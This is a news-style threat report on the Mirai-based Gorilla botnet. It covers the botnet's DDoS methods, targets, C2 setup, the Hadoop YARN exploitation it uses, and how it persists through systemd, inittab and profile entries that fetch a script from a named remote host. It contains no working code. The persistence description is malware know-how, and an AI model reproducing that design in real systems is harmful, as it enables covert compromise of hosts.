Gorilla Botnet

Cybersecurity researchers have identified a new family of botnet malware known as Gorilla (or GorillaBot), which is based on the disclosed source code of the Mirai Botnet.

According to the experts monitoring this activity, the Gorilla botnet executed more than 300,000 attack commands within a remarkably short period, with an astonishing attack rate in September 2024. On average, the botnet launched around 20,000 commands daily, specifically aimed at facilitating distributed denial-of-service (DDoS) attacks.

Over 100 Countries Targeted by DDoS Attempts

The botnet is reported to have targeted over 100 countries, launching attacks against universities, government websites, telecommunications, banks, as well as the gaming and gambling industries. The most affected nations include China, the United States, Canada and Germany.

Experts indicate that Gorilla primarily employs methods such as UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood to carry out its DDoS attacks. The connectionless nature of the UDP protocol enables arbitrary source IP spoofing, resulting in a significant volume of traffic.

In addition to its support for multiple CPU architectures, including ARM, MIPS, x86_64, and x86, the botnet is equipped with the capability to connect to one of five predefined Command-and-Control (C2) servers to receive DDoS commands.

Exploiting Vulnerabilities and Persistence Mechanism

In a notable development, the malware incorporates functions to exploit a security vulnerability in Apache Hadoop YARN RPC, allowing it to achieve remote code execution. This particular flaw has been exploited in the wild since at least 2021.

To ensure persistence on the host, the malware creates a service file named custom.service in the /etc/systemd/system/ directory, which is configured to run automatically at system startup. This service is tasked with downloading and executing a shell script called lol.sh from a remote server (pen.gorillafirewall.su). Additionally, similar commands are inserted into the /etc/inittab, /etc/profile, and /boot/bootcmd files to facilitate the downloading and execution of the shell script upon system startup or user login.

The malware introduces a variety of DDoS attack methods and employs encryption algorithms commonly used by the Keksec group to obscure critical information. It also utilizes multiple techniques to maintain long-term control over IoT devices and cloud hosts, reflecting a sophisticated awareness of counter-detection measures typical of emerging botnet families.

Some security researchers suggest that the Gorilla Botnet malware is not entirely new, having been active for over a year.